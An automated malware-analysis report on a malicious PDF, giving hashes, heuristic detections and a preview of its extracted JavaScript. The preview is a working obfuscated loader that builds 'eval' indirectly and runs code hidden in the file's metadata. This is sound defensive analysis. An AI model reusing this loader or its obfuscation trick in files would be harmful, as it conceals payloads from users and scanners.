Malicious PDF — malware analysis report

Static analysis result for SHA-256 a27a10c98348ce6f…

MALICIOUS

PDF

22.2 KB Created: 2010-07-25 10:32:51 First seen: 2026-05-07
MD5: 11ae7d5161e502a647f27a4a92c204db SHA-1: a0f4ee3e427f460b1a831c35d8bdfbdbbea607f0 SHA-256: a27a10c98348ce6f63733bb90dcb46daadd3230141b8ffaa7bc586e86c8a36d8
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged as malicious by an ML classifier with a very high score. Static analysis revealed embedded and obfuscated JavaScript, indicated by PDF_JAVASCRIPT and PDF_JS heuristics, and the use of String.fromCharCode. The embedded JavaScript file, javascript_obj0001_000.js, is likely responsible for downloading and executing a second-stage payload. The ML classifier's strong signal and the presence of obfuscated script suggest a high likelihood of malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    zqsg\(zqsg\('String.fromCharCode\(' + jduex + '\)'\)\);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x56A1 395 bytes
SHA-256: 0a2183af0bc2cd210feaa3c100bc040c32101e042db55211cd9c191482269b56
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
manlq = app;
kbqc = new Date(2010,11,4);
var dylef='';
var urkcr = 'e'+kbqc.getDay()+'a'+dylef+'l';
urkcr = urkcr.replace('6','v');
zqsg=manlq[urkcr];
var dylef='';
zqsg('va'+dylef+'r ubqy=th'+dylef+'i'+dylef+'s');
mmifk='pr' + dylef + kbqc.getDay() + dylef + 'uc' +'er';
mmifk = mmifk.replace('6', 'od');
var jduex = ubqy[mmifk];
zqsg(zqsg('String.fromCharCode(' + jduex + ')'));

Open this report in the interactive analyzer, or submit your own file for analysis.